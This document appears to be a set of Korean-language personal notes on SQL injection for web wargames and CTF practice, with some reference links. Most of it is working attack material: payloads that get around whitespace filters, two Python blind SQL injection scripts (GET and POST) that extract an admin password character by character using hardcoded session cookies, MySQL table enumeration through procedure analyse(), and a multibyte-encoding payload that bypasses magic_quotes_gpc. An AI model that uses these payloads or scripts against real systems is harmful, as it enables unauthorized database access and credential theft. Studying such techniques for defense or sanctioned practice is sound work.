url

https://codingsec.net/2016/04/sql-injection/

https://codingsec.net/2016/05/brute-forcing-html-form-authentication-using-python/

http://modernpug.github.io/php-the-right-way/

http://php.net/docs.php

http://attrition.org/

https://wikidocs.net/read/750

http://suninatas.com/

아래 내용 출처 : http://binaryu.tistory.com/

SQL Injection 공백 우회방법

1. Tab : %09

  - no=1%09or%09id='admin'

 

2. Line Feed (\n): %0a

  - no=1%0aor%0aid='admin'

 

3. Carrage Return(\r) : %0d

  - no=1%0dor%0did='admin'

 

4. 주석 : /**/

  - no=1/**/or/**/id='admin'

 

5. 괄호 : ()

  - no=(1)or(id='admin')

 

6. 더하기 : +

  - no=1+or+id='admin'

[PHP2EXE] PHP Compiler/Embedder 1.21

php로 짠 프로그램을 홈페이지 서버가 없이, PC에서 컴파일하여 실행시킨다.

 

간단한 php 소스를 수정하면서, 분석할때 유용하다.

Python Blind Injection Sample

[GET 방식 샘플]

import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password=""

for j in range(1,100):
   print "%d" %j
   for i in range(33,126):
       url="http://binaryu.tistory.com/index.php?no=2+and+substring(pw,%d,1)=char(%d)" %(j,i)
       req=urllib2.Request(url)
       req.add_header('Cookie',"notice=yes; PHPSESSID=863fc9ebeb49ef2bb20976baed9de368")
       read=urllib2.urlopen(req).read()
       ok = re.findall("True",read)
       if ok:
           password=password+chr(i)
           print password
           break

[POST 방식 샘플]

import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password=""

for j in range(1, 33):
   for i in range(48,123):
      if i < 58 or i > 96:
          url="http://binaryu.tistory.com/index.php"
          login_form={"id": "admin' and substr(pw,%d,1)=char(%s)#" %(j,i), "pw": ""}
          login_req=urllib.urlencode(login_form)
          req=urllib2.Request(url,login_req)
          req.add_header('Cookie',"notice=yes; PHPSESSID=c473aaff2c3d93c21ad8a0a2cf505036")
          read=urllib2.urlopen(req).read()
          ok = re.findall("Wrong password!",read)
          if ok:
              password=password+chr(i)
              print password
              break

Mysql Table Name Search

Query 구문 마지막에 다음과 같이 procedure analyse()를 추가하면,

 

관련된 DB명, Table명, Field명을 확인 할 수있다.

 

select * from table procedure analyse();

mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기

PHP에서 SQL-Injection을 할때, magic_quotes_gpc 설정때문에 '입력이 안될경우 :

 

mb_convert_encoding 취약점 (%a1 ~ %fe 으로 magic_quotes_gpc %27 우회)

차단 : id=%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
우회 : id=%aa%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest